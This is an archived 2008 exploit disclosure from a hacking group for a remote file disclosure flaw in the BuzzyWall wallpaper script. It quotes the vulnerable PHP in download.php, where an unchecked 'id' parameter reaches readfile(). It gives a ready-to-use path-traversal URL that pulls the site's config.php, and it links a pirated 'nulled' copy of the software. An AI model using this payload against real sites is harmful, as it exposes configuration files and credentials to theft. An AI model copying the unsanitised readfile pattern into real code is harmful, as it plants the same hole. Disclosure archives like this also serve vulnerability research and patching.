buzzywall-disclose.txt

2008-10-27T00:00:00
ID PACKETSTORM:71248
Type packetstorm
Reporter b3hz4d
Modified 2008-10-27T00:00:00

Description

                                        
                                            ` ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+ +  
+ BuzzyWall Remote File Disclosure Vulnerability +  
+ +  
+ Discovered by b3hz4d +  
+ +  
+ WwW.DeltaHacking.Net +  
+ +  
+ +  
+ +  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
AUTHOR : b3hz4d  
DATE : 25 oct 2008  
SITE : WwW.DeltaHacking.Net  
  
  
#####################################################  
  
APPLICATION : BuzzyWall  
DOWNLOAD : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip  
VENDOR : http://www.buzzywall.com  
  
#####################################################  
  
  
[+] vuln : ./download.php  
  
  
$file_name = $_GET['id']  
  
$file_path = $weburl."wallpapers/full/".$file_name;  
  
.  
  
.  
  
.  
  
.  
  
readfile("$file_path");  
  
  
  
[+] Exploit : http://victim.com/download.php?id=../../config.php  
  
  
  
##############################################################################  
  
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net #  
  
##############################################################################  
  
`